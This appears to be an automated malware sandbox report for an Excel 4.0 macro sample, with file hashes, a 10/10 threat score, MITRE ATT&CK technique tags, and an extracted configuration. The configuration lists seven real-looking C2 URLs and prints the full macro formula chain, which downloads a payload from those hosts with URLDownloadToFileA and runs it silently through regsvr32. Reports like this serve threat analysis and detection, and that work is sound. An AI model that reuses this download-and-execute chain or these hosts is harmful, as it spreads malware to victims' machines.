e779167e191af5c2ee1116181a42504565f6f90f10b6a1ff4c0b7d086c379c2a

General

Target

e779167e191af5c2ee1116181a42504565f6f90f10b6a1ff4c0b7d086c379c2a
Size

35KB
Sample

241120-x7eycsselp
MD5

9014f88c4b89a6a945a0e04593b9cf50
SHA1

e296a3002c0f8c5bea7f4e6ee2232421233827a6
SHA256

e779167e191af5c2ee1116181a42504565f6f90f10b6a1ff4c0b7d086c379c2a
SHA512

238d48f070c33d19ad8afa7f3e33fc91135a65f8ab7a32a700636dcd9244add05f417187bdc571841978687a276f16938587fc4c6a93eecd11851ffbf7c8c33e
SSDEEP

768:KYKtm5eMn7AjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooXLR:KYKtmg+UOZZ1ZYpoQ/pMAm

Score

10^/10

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

https://casinojackpotking.com/cgi-bin/47sKbklSQf31/

https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/

https://directorkay.com.ng/wp-admin/MYP3NA/

https://deatravel.al/wp-includes/H544R/

https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/

https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/

https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/

Attributes

formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casinojackpotking.com/cgi-bin/47sKbklSQf31/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://directorkay.com.ng/wp-admin/MYP3NA/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://deatravel.al/wp-includes/H544R/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Targets

- Target
  
  e779167e191af5c2ee1116181a42504565f6f90f10b6a1ff4c0b7d086c379c2a
- Size
  
  35KB
- MD5
  
  9014f88c4b89a6a945a0e04593b9cf50
- SHA1
  
  e296a3002c0f8c5bea7f4e6ee2232421233827a6
- SHA256
  
  e779167e191af5c2ee1116181a42504565f6f90f10b6a1ff4c0b7d086c379c2a
- SHA512
  
  238d48f070c33d19ad8afa7f3e33fc91135a65f8ab7a32a700636dcd9244add05f417187bdc571841978687a276f16938587fc4c6a93eecd11851ffbf7c8c33e
- SSDEEP
  
  768:KYKtm5eMn7AjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooXLR:KYKtmg+UOZZ1ZYpoQ/pMAm
Score

10^/10

discovery
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
behavioral1 behavioral2

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Tasks

Sharing

General

Malware Config

Extracted

Targets

Process spawned unexpected child process

MITRE ATT&CK Enterprise v15

Tasks

static1

behavioral1

behavioral2